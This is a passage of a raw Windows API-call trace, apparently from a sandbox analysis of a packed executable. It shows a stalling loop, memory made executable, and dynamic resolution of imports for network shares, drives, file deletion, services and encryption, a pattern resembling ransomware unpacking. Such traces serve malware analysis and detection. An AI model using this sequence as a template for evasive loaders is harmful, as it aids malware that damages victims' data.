lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.869] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.869] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.869] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.869] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.869] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.869] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.869] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.869] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.869] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.869] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.869] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.869] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.869] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.869] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.869] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.870] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.870] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.870] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.870] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.870] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.870] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.870] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.870] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.870] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.870] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.870] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.870] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.870] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.870] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.870] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.870] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.870] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.870] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.870] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.870] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.870] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.870] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.870] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.870] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.870] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.870] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.870] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.870] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.870] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.871] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.871] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.871] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.871] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.871] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.871] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.871] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.871] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.871] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0116.542] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0116.584] VirtualProtect (in: lpAddress=0x5e0020, dwSize=0x90e08, flNewProtect=0x40, lpflOldProtect=0x18e670 | out: lpflOldProtect=0x18e670*=0x4) returned 1 [0116.657] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0116.657] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalAlloc") returned 0x76d4588e [0116.657] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0116.657] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0116.657] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0116.657] GetProcAddress (hModule=0x76d30000, lpProcName="CreateToolhelp32Snapshot") returned 0x76d6735f [0116.657] GetProcAddress (hModule=0x76d30000, lpProcName="Module32First") returned 0x76dc5cd9 [0116.658] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0116.658] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0x58 [0116.660] Module32First (hSnapshot=0x58, lpme=0x18ec00) returned 1 [0116.663] VirtualAlloc (lpAddress=0x0, dwSize=0x119e50, flAllocationType=0x1000, flProtect=0x40) returned 0x1e20000 [0116.715] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryA") returned 0x76d449d7 [0116.715] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0116.715] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0116.715] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualProtect") returned 0x76d4435f [0116.715] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualFree") returned 0x76d4186e [0116.716] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersionExA") returned 0x76d43519 [0116.716] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0116.716] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0116.716] GetProcAddress (hModule=0x76d30000, lpProcName="SetErrorMode") returned 0x76d41b00 [0116.716] SetErrorMode (uMode=0x400) returned 0x0 [0116.716] SetErrorMode (uMode=0x0) returned 0x400 [0116.716] GetVersionExA (in: lpVersionInformation=0x18db30*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x65006564, dwMinorVersion=0x7373, dwBuildNumber=0x3, dwPlatformId=0xffffffff, szCSDVersion="s}Çw") | out: lpVersionInformation=0x18db30*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0116.716] VirtualAlloc (lpAddress=0x0, dwSize=0x119000, flAllocationType=0x1000, flProtect=0x4) returned 0x1f40000 [0116.737] VirtualProtect (in: lpAddress=0x400000, dwSize=0x137000, flNewProtect=0x40, lpflOldProtect=0x18ebb8 | out: lpflOldProtect=0x18ebb8*=0x2) returned 1 [0117.096] LoadLibraryA (lpLibFileName="RPCRT4.dll") returned 0x76af0000 [0117.096] GetProcAddress (hModule=0x76af0000, lpProcName="RpcStringFreeW") returned 0x76b11635 [0117.097] GetProcAddress (hModule=0x76af0000, lpProcName="UuidCreate") returned 0x76b0f48b [0117.097] GetProcAddress (hModule=0x76af0000, lpProcName="UuidToStringW") returned 0x76b31ee5 [0117.097] GetProcAddress (hModule=0x76af0000, lpProcName="RpcStringFreeA") returned 0x76b33fc5 [0117.097] GetProcAddress (hModule=0x76af0000, lpProcName="UuidToStringA") returned 0x76b6d918 [0117.097] LoadLibraryA (lpLibFileName="MPR.dll") returned 0x75640000 [0117.100] GetProcAddress (hModule=0x75640000, lpProcName="WNetOpenEnumW") returned 0x75642f06 [0117.100] GetProcAddress (hModule=0x75640000, lpProcName="WNetEnumResourceW") returned 0x75643058 [0117.100] GetProcAddress (hModule=0x75640000, lpProcName="WNetCloseEnum") returned 0x75642dd6 [0117.100] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x758d0000 [0117.116] GetProcAddress (hModule=0x758d0000, lpProcName="InternetCloseHandle") returned 0x758eab49 [0117.117] GetProcAddress (hModule=0x758d0000, lpProcName="InternetReadFile") returned 0x758eb406 [0117.117] GetProcAddress (hModule=0x758d0000, lpProcName="InternetOpenUrlW") returned 0x7594be5c [0117.117] GetProcAddress (hModule=0x758d0000, lpProcName="InternetOpenW") returned 0x758f9197 [0117.117] GetProcAddress (hModule=0x758d0000, lpProcName="HttpQueryInfoW") returned 0x758f5c75 [0117.117] GetProcAddress (hModule=0x758d0000, lpProcName="InternetOpenA") returned 0x758ff18e [0117.117] GetProcAddress (hModule=0x758d0000, lpProcName="InternetOpenUrlA") returned 0x759130f1 [0117.117] LoadLibraryA (lpLibFileName="WINMM.dll") returned 0x75600000 [0117.121] GetProcAddress (hModule=0x75600000, lpProcName="timeGetTime") returned 0x756026e0 [0117.121] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x772f0000 [0117.122] GetProcAddress (hModule=0x772f0000, lpProcName="PathAppendA") returned 0x772fd65e [0117.122] GetProcAddress (hModule=0x772f0000, lpProcName="PathFindFileNameW") returned 0x7730bb71 [0117.122] GetProcAddress (hModule=0x772f0000, lpProcName="PathRemoveFileSpecW") returned 0x77303248 [0117.122] GetProcAddress (hModule=0x772f0000, lpProcName="PathFileExistsA") returned 0x7732ad1a [0117.122] GetProcAddress (hModule=0x772f0000, lpProcName="PathFileExistsW") returned 0x773045bf [0117.122] GetProcAddress (hModule=0x772f0000, lpProcName="PathAppendW") returned 0x773081ef [0117.122] GetProcAddress (hModule=0x772f0000, lpProcName="PathFindExtensionW") returned 0x7730a1b9 [0117.122] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76d30000 [0117.123] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualFree") returned 0x76d4186e [0117.123] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0117.123] GetProcAddress (hModule=0x76d30000, lpProcName="GetDriveTypeA") returned 0x76d5ef75 [0117.123] GetProcAddress (hModule=0x76d30000, lpProcName="OpenProcess") returned 0x76d41986 [0117.123] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalAlloc") returned 0x76d4588e [0117.123] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemDirectoryW") returned 0x76d45063 [0117.124] GetProcAddress (hModule=0x76d30000, lpProcName="WideCharToMultiByte") returned 0x76d4170d [0117.124] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryW") returned 0x76d4492b [0117.124] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0117.124] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileW") returned 0x76d6830d [0117.124] GetProcAddress (hModule=0x76d30000, lpProcName="FormatMessageW") returned 0x76d44620 [0117.124] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcpynW") returned 0x76d6d556 [0117.124] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessA") returned 0x76d41072 [0117.124] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0117.124] GetProcAddress (hModule=0x76d30000, lpProcName="ReadFile") returned 0x76d43ed3 [0117.124] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0117.125] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcatA") returned 0x76d62b7a [0117.125] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentVariableA") returned 0x76d433a0 [0117.125] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcmpW") returned 0x76d45929 [0117.125] GetProcAddress (hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0117.125] GetProcAddress (hModule=0x76d30000, lpProcName="lstrlenW") returned 0x76d41700 [0117.125] GetProcAddress (hModule=0x76d30000, lpProcName="FlushFileBuffers") returned 0x76d4469b [0117.125] GetProcAddress (hModule=0x76d30000, lpProcName="GetShortPathNameA") returned 0x76d6594d [0117.125] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileSizeEx") returned 0x76d459e2 [0117.125] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0117.126] GetProcAddress (hModule=0x76d30000, lpProcName="SetLastError") returned 0x76d411a9 [0117.126] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0117.126] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0117.126] GetProcAddress (hModule=0x76d30000, lpProcName="MoveFileW") returned 0x76d59af0 [0117.126] GetProcAddress (hModule=0x76d30000, lpProcName="FindClose") returned 0x76d44442 [0117.126] GetProcAddress (hModule=0x76d30000, lpProcName="Process32FirstW") returned 0x76d68baf [0117.126] GetProcAddress (hModule=0x76d30000, lpProcName="LocalAlloc") returned 0x76d4168c [0117.126] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventW") returned 0x76d4183e [0117.126] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameA") returned 0x76d414b1 [0117.127] GetProcAddress (hModule=0x76d30000, lpProcName="Process32NextW") returned 0x76d6896c [0117.127] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcatW") returned 0x76d6828e [0117.127] GetProcAddress (hModule=0x76d30000, lpProcName="CreateMutexA") returned 0x76d44c6b [0117.127] GetProcAddress (hModule=0x76d30000, lpProcName="FindNextFileW") returned 0x76d454ee [0117.127] GetProcAddress (hModule=0x76d30000, lpProcName="CreateToolhelp32Snapshot") returned 0x76d6735f [0117.127] GetProcAddress (hModule=0x76d30000, lpProcName="SetEnvironmentVariableA") returned 0x76d4e331 [0117.127] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileW") returned 0x76d489b3 [0117.127] GetProcAddress (hModule=0x76d30000, lpProcName="LocalFree") returned 0x76d42d3c [0117.127] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcpyW") returned 0x76d63102 [0117.128] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileA") returned 0x76d45444 [0117.128] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcpyA") returned 0x76d62a9d [0117.128] GetProcAddress (hModule=0x76d30000, lpProcName="SetPriorityClass") returned 0x76d5cf28 [0117.128] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcess") returned 0x76d41809 [0117.128] GetProcAddress (hModule=0x76d30000, lpProcName="GetComputerNameW") returned 0x76d4dd0e [0117.128] GetProcAddress (hModule=0x76d30000, lpProcName="GetLogicalDrives") returned 0x76d45371 [0117.128] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0117.128] GetProcAddress (hModule=0x76d30000, lpProcName="SetStdHandle") returned 0x76dc454f [0117.128] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersion") returned 0x76d44467 [0117.129] GetProcAddress (hModule=0x76d30000, lpProcName="CreateDirectoryA") returned 0x76d6d526 [0117.129] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThread") returned 0x76d434d5 [0117.129] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringW") returned 0x76d43bca [0117.129] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeFormatW") returned 0x76d5f481 [0117.129] GetProcAddress (hModule=0x76d30000, lpProcName="GetDateFormatW") returned 0x76d634d7 [0117.129] GetProcAddress (hModule=0x76d30000, lpProcName="EnumSystemLocalesW") returned 0x76dc425f [0117.129] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultLCID") returned 0x76d43da5 [0117.129] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidLocale") returned 0x76d5ce46 [0117.129] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoW") returned 0x76d43c42 [0117.130] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSemaphoreW") returned 0x76d5ca5a [0117.130] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleW") returned 0x76d434b0 [0117.130] GetProcAddress (hModule=0x76d30000, lpProcName="GetTickCount") returned 0x76d4110c [0117.130] GetProcAddress (hModule=0x76d30000, lpProcName="TlsFree") returned 0x76d43587 [0117.130] GetProcAddress (hModule=0x76d30000, lpProcName="TlsSetValue") returned 0x76d414fb [0117.130] GetProcAddress (hModule=0x76d30000, lpProcName="TlsGetValue") returned 0x76d411e0 [0117.130] GetProcAddress (hModule=0x76d30000, lpProcName="TlsAlloc") returned 0x76d449ad [0117.130] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76d41916 [0117.130] GetProcAddress (hModule=0x76d30000, lpProcName="SetUnhandledExceptionFilter") returned 0x76d487c9 [0117.131] GetProcAddress (hModule=0x76d30000, lpProcName="UnhandledExceptionFilter") returned 0x76d6772f [0117.131] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleA") returned 0x76d41245 [0117.131] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersionExA") returned 0x76d43519 [0117.131] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalMemoryStatus") returned 0x76d48b6d [0117.131] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryA") returned 0x76d449d7 [0117.131] GetProcAddress (hModule=0x76d30000, lpProcName="FlushConsoleInputBuffer") returned 0x76de7a9f [0117.131] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForSingleObject") returned 0x76d41136 [0117.131] GetProcAddress (hModule=0x76d30000, lpProcName="CreateDirectoryW") returned 0x76d44259 [0117.131] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointerEx") returned 0x76d5c807 [0117.132] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessW") returned 0x76d4103d [0117.132] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibrary") returned 0x76d434c8 [0117.132] GetProcAddress (hModule=0x76d30000, lpProcName="SetErrorMode") returned 0x76d41b00 [0117.132] GetProcAddress (hModule=0x76d30000, lpProcName="lstrlenA") returned 0x76d45a4b [0117.132] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointer") returned 0x76d417d1 [0117.132] GetProcAddress (hModule=0x76d30000, lpProcName="FindFirstFileW") returned 0x76d44435 [0117.132] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleMode") returned 0x76d5a77d [0117.132] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileA") returned 0x76d453c6 [0117.132] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineW") returned 0x76d45223 [0117.133] GetProcAddress (hModule=0x76d30000, lpProcName="GetNumberOfConsoleInputEvents") returned 0x76de793f [0117.133] GetProcAddress (hModule=0x76d30000, lpProcName="PeekConsoleInputA") returned 0x76de6f0d [0117.133] GetProcAddress (hModule=0x76d30000, lpProcName="FreeEnvironmentStringsW") returned 0x76d451cb [0117.133] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentStringsW") returned 0x76d451e3 [0117.133] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessId") returned 0x76d411f8 [0117.133] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceCounter") returned 0x76d41725 [0117.133] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeZoneInformation") returned 0x76d4465a [0117.133] GetProcAddress (hModule=0x76d30000, lpProcName="RaiseException") returned 0x76d458a6 [0117.133] GetProcAddress (hModule=0x76d30000, lpProcName="GetStringTypeW") returned 0x76d41946 [0117.134] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleCP") returned 0x76de7bff [0117.134] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleW") returned 0x76de739a [0117.134] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleMode") returned 0x76d41328 [0117.134] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSize") returned 0x77c73002 [0117.134] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryExW") returned 0x76d4495d [0117.134] GetProcAddress (hModule=0x76d30000, lpProcName="OutputDebugStringW") returned 0x76d6d1d4 [0117.134] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleCtrlHandler") returned 0x76d48a09 [0117.134] GetProcAddress (hModule=0x76d30000, lpProcName="RtlUnwind") returned 0x76d6d1c3 [0117.134] GetProcAddress (hModule=0x76d30000, lpProcName="FatalAppExitA") returned 0x76dc4691 [0117.135] GetProcAddress (hModule=0x76d30000, lpProcName="GetStartupInfoW") returned 0x76d44d40 [0117.135] GetProcAddress (hModule=0x76d30000, lpProcName="GetExitCodeProcess") returned 0x76d5174d [0117.135] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringW") returned 0x76d417b9 [0117.135] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0117.135] GetProcAddress (hModule=0x76d30000, lpProcName="AreFileApisANSI") returned 0x76dc40d1 [0117.135] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0117.135] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcessHeap") returned 0x76d414e9 [0117.135] GetProcAddress (hModule=0x76d30000, lpProcName="HeapReAlloc") returned 0x77c81f6e [0117.135] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalFree") returned 0x76d45558 [0117.136] GetProcAddress (hModule=0x76d30000, lpProcName="SetEndOfFile") returned 0x76d5ce2e [0117.136] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleInputA") returned 0x76de6f53 [0117.136] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0117.136] GetProcAddress (hModule=0x76d30000, lpProcName="HeapFree") returned 0x76d414c9 [0117.136] GetProcAddress (hModule=0x76d30000, lpProcName="HeapAlloc") returned 0x77c6e026 [0117.136] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0117.136] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0117.136] GetProcAddress (hModule=0x76d30000, lpProcName="GetStdHandle") returned 0x76d451b3 [0117.136] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileType") returned 0x76d43531 [0117.137] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleExW") returned 0x76d44a6f [0117.137] GetProcAddress (hModule=0x76d30000, lpProcName="WriteConsoleW") returned 0x76d67aca [0117.137] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0117.137] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0117.137] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemTimeAsFileTime") returned 0x76d43509 [0117.137] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0117.137] GetProcAddress (hModule=0x76d30000, lpProcName="IsProcessorFeaturePresent") returned 0x76d45235 [0117.137] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidCodePage") returned 0x76d44493 [0117.137] GetProcAddress (hModule=0x76d30000, lpProcName="GetACP") returned 0x76d4179c [0117.138] GetProcAddress (hModule=0x76d30000, lpProcName="GetOEMCP") returned 0x76d6d1a1 [0117.138] GetProcAddress (hModule=0x76d30000, lpProcName="GetCPInfo") returned 0x76d45189 [0117.138] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThread") returned 0x76d417ec [0117.138] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0117.138] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x77130000 [0117.138] GetProcAddress (hModule=0x77130000, lpProcName="PeekMessageW") returned 0x771505ba [0117.138] GetProcAddress (hModule=0x77130000, lpProcName="PostThreadMessageW") returned 0x77148bff [0117.139] GetProcAddress (hModule=0x77130000, lpProcName="DefWindowProcW") returned 0x77c725dd [0117.139] GetProcAddress (hModule=0x77130000, lpProcName="DispatchMessageW") returned 0x7714787b [0117.139] GetProcAddress (hModule=0x77130000, lpProcName="UpdateWindow") returned 0x77153559 [0117.139] GetProcAddress (hModule=0x77130000, lpProcName="CreateWindowExW") returned 0x77148a29 [0117.139] GetProcAddress (hModule=0x77130000, lpProcName="LoadCursorW") returned 0x771488f7 [0117.139] GetProcAddress (hModule=0x77130000, lpProcName="IsWindow") returned 0x77147136 [0117.139] GetProcAddress (hModule=0x77130000, lpProcName="ShowWindow") returned 0x77150dfb [0117.139] GetProcAddress (hModule=0x77130000, lpProcName="RegisterClassExW") returned 0x7714b17d [0117.139] GetProcAddress (hModule=0x77130000, lpProcName="PostQuitMessage") returned 0x77149abb [0117.140] GetProcAddress (hModule=0x77130000, lpProcName="GetMessageW") returned 0x771478e2 [0117.140] GetProcAddress (hModule=0x77130000, lpProcName="DestroyWindow") returned 0x77149a55 [0117.140] GetProcAddress (hModule=0x77130000, lpProcName="SendMessageW") returned 0x77149679 [0117.140] GetProcAddress (hModule=0x77130000, lpProcName="GetProcessWindowStation") returned 0x77149eea [0117.140] GetProcAddress (hModule=0x77130000, lpProcName="GetUserObjectInformationW") returned 0x77148068 [0117.140] GetProcAddress (hModule=0x77130000, lpProcName="MessageBoxA") returned 0x7719fd1e [0117.140] GetProcAddress (hModule=0x77130000, lpProcName="GetDesktopWindow") returned 0x77150a19 [0117.140] GetProcAddress (hModule=0x77130000, lpProcName="MessageBoxW") returned 0x7719fd3f [0117.140] GetProcAddress (hModule=0x77130000, lpProcName="TranslateMessage") returned 0x77147809 [0117.140] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77710000 [0117.141] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0117.141] GetProcAddress (hModule=0x77710000, lpProcName="CloseServiceHandle") returned 0x7772369c [0117.141] GetProcAddress (hModule=0x77710000, lpProcName="GetUserNameW") returned 0x7772157a [0117.141] GetProcAddress (hModule=0x77710000, lpProcName="ReportEventA") returned 0x77713ee9 [0117.141] GetProcAddress (hModule=0x77710000, lpProcName="RegisterEventSourceA") returned 0x77722d46 [0117.141] GetProcAddress (hModule=0x77710000, lpProcName="DeregisterEventSource") returned 0x777235dd [0117.141] GetProcAddress (hModule=0x77710000, lpProcName="CryptHashData") returned 0x7771df36 [0117.141] GetProcAddress (hModule=0x77710000, lpProcName="RegSetValueExW") returned 0x777214d6 [0117.142] GetProcAddress (hModule=0x77710000, lpProcName="CryptDestroyHash") returned 0x7771df66 [0117.142] GetProcAddress (hModule=0x77710000, lpProcName="ControlService") returned 0x77737144 [0117.142] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExW") returned 0x7772468d [0117.142] GetProcAddress (hModule=0x77710000, lpProcName="CryptCreateHash") returned 0x7771df4e [0117.142] GetProcAddress (hModule=0x77710000, lpProcName="CryptEncrypt") returned 0x7773779b [0117.142] GetProcAddress (hModule=0x77710000, lpProcName="CryptImportKey") returned 0x7771c532 [0117.142] GetProcAddress (hModule=0x77710000, lpProcName="QueryServiceStatus") returned 0x77722a86 [0117.142] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueExW") returned 0x777246ad [0117.142] GetProcAddress (hModule=0x77710000, lpProcName="CryptReleaseContext") returned 0x7771e124 [0117.143] GetProcAddress (hModule=0x77710000, lpProcName="OpenServiceW") returned 0x7771ca4c [0117.143] GetProcAddress (hModule=0x77710000, lpProcName="OpenSCManagerW") returned 0x7771ca64 [0117.143] GetProcAddress (hModule=0x77710000, lpProcName="CryptAcquireContextW") 